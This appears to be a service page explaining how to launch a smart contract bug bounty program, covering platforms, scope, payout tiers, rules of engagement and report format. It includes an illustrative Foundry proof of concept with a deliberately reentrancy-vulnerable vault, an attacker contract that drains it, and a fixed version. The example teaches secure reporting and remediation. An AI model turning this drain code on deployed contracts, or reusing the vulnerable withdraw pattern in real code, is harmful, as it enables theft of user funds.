Post-deploy smart contract monitoring

We design and develop full-cycle blockchain solutions: from smart contract architecture to launching DeFi protocols, NFT marketplaces and crypto exchanges. Security audits, tokenomics, integration with existing infrastructure.
Setup of Bug Bounty for Smart Contracts

A bug bounty is a continuous vulnerability reward program launched after the audit. An audit is a security snapshot at deployment time; a bug bounty is an ongoing process for the lifetime of the protocol. Major DeFi protocols pay from $50K to well over $10M for critical findings: the Ethereum Foundation offers up to $250K, Uniswap up to $15.5M, MakerDAO up to $10M.

Technically, setting up a program is not complex, but it requires a clear scope, clear rules and a reward schedule that researchers can rely on.

Main platforms

Immunefi is the largest DeFi-specialized platform, with $100M+ paid out since launch. It specializes in smart contracts and blockchain and is used by most major DeFi protocols. Commission: 10% of bounties paid.

HackerOne is a general bug bounty platform with a large community. It is less specialized in DeFi but has verified web3 researchers, and is a good choice if the protocol also has web2 components (API, frontend).

Code4rena and Sherlock run audit contests rather than classic bug bounties. Sherlock, however, also offers exploit coverage, which for some protocols may be worth more than a bounty program.

For a DeFi protocol, Immunefi is the standard choice.

Program structure

Scope

Clearly define what is in scope and what is out of scope. Example:

In scope (smart contracts):

  • All contracts at the addresses [list] on Ethereum mainnet (verified source; pin the audited commit so researchers test the deployed code, not a branch)
  • Contracts on Arbitrum [addresses]

Out of scope:

  • Frontend bugs (XSS) and phishing
  • Centralized infrastructure (servers, databases)
  • Already known issues (link to the public audit report)
  • Bugs requiring physical access to a device
  • Vulnerabilities in the dependencies themselves (OpenZeppelin, Chainlink); these belong to the upstream program, but incorrect use of a dependency by the protocol stays in scope

Severity classification and payouts

Severity   Criteria                                       Payout
Critical   Direct theft or loss of user funds             $50K - $200K
High       Significant damage under specific conditions   $10K - $50K
Medium     Limited damage, complex preconditions          $1K - $10K
Low        Minor impact                                   $100 - $1K

Payouts should scale with TVL. A protocol with $10M TVL and a $5K maximum bounty will not attract serious researchers. The usual rule: the critical bounty equals 10% of the maximum possible damage, with a minimum of $50K for a production protocol. Publish the rule in the program text so a researcher can estimate the payout before investing time.

Rules of Engagement

  • No public disclosure until the fix is deployed and confirmed (responsible disclosure)
  • No DoS or disruption of the live protocol during testing; reproduce on a local fork or a testnet
  • First reporter wins: if two researchers report the same vulnerability, the earlier submission timestamp gets the reward
  • KYC required for payouts above a threshold (usually $10K), for AML compliance
  • Exploiting a found vulnerability for personal gain before reporting it is forbidden

Report requirements

A good report must contain:

  1. A description of the vulnerability and its impact
  2. A reproducible proof of concept (Foundry test or script), pinned to a specific block so triage can rerun it on a fork
  3. A proposed fix

Immunefi provides a template. Incomplete reports without a PoC get the lowest priority.
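What a Critical-severity submission looks like in practice, as an added illustration rather than anything from the original page or a real protocol: a constructed vault with a reentrancy bug (state updated after the external call), the attacker contract that drains it, a Foundry test proving direct theft of user funds, and a second test showing that the proposed fix stops the same attack. Contract names, balances and the forge-std cheatcodes used are all part of this constructed example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "forge-std/Test.sol";

interface IVault {
    function deposit() external payable;
    function withdraw() external;
}

// Constructed, deliberately vulnerable vault (not any real protocol's code).
// withdraw() makes the external call before zeroing the balance, so the
// recipient can re-enter and drain every depositor's ETH.
contract VulnerableVault is IVault {
    mapping(address => uint256) public balances;

    function deposit() external payable { balances[msg.sender] += msg.value; }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        balances[msg.sender] = 0; // too late: state is updated after the call
    }
}

// Proposed fix for the report: checks-effects-interactions, balance zeroed
// before the external call, so a re-entrant withdraw() finds nothing to pay.
contract FixedVault is IVault {
    mapping(address => uint256) public balances;

    function deposit() external payable { balances[msg.sender] += msg.value; }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0; // effect before interaction
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// Attacker contract: re-enters withdraw() from receive() while the vault
// still believes the attacker's balance is non-zero.
contract Drainer {
    IVault public immutable vault;
    constructor(IVault _vault) { vault = _vault; }

    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.withdraw();
    }

    receive() external payable {
        // keep re-entering while the vault can still pay one more round
        if (address(vault).balance >= msg.value) vault.withdraw();
    }
}

contract BountyPoC is Test {
    address victim = makeAddr("victim");
    address attacker = makeAddr("attacker");

    // Seed a vault with 10 ETH of honest deposits (the "funds at risk").
    function _seed(IVault vault) internal {
        vm.deal(victim, 10 ether);
        vm.prank(victim);
        vault.deposit{value: 10 ether}();
        vm.deal(attacker, 1 ether);
    }

    // Critical: direct theft of user funds, reproducible in one transaction.
    function testCritical_DrainsAllDeposits() public {
        VulnerableVault vault = new VulnerableVault();
        _seed(vault);
        Drainer d = new Drainer(vault);

        vm.prank(attacker);
        d.attack{value: 1 ether}();

        assertEq(address(vault).balance, 0);        // vault emptied
        assertEq(address(d).balance, 11 ether);     // 10 ETH stolen + attacker's own 1 ETH
    }

    // The same attack against the proposed fix must revert and leave funds intact.
    function testFix_ReentrancyReverts() public {
        FixedVault vault = new FixedVault();
        _seed(vault);
        Drainer d = new Drainer(vault);

        vm.prank(attacker);
        vm.expectRevert(bytes("transfer failed"));
        d.attack{value: 1 ether}();

        assertEq(address(vault).balance, 10 ether); // victim's deposit untouched
    }
}
```

Run it with `forge test`. Against a live, in-scope deployment the same test would start with `vm.createSelectFork(rpcUrl, blockNumber)` on a pinned block and target the real addresses, so the PoC executes entirely on a local fork and never touches the production protocol, which is exactly what the rules of engagement above require. Including the fixed variant with its own passing test gives triage both the impact and the proposed remediation in one runnable artifact.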

After launch

Respond to reports within 48 hours. Long silence earns a bad reputation in the researcher community. Payouts through Immunefi are handled by the platform (stablecoins or the native token, at the researcher's choice).

Launching on Immunefi: create an account → fill in the scope → set the budget → Immunefi verifies the program → publish. This takes 1-2 weeks from submission to publication.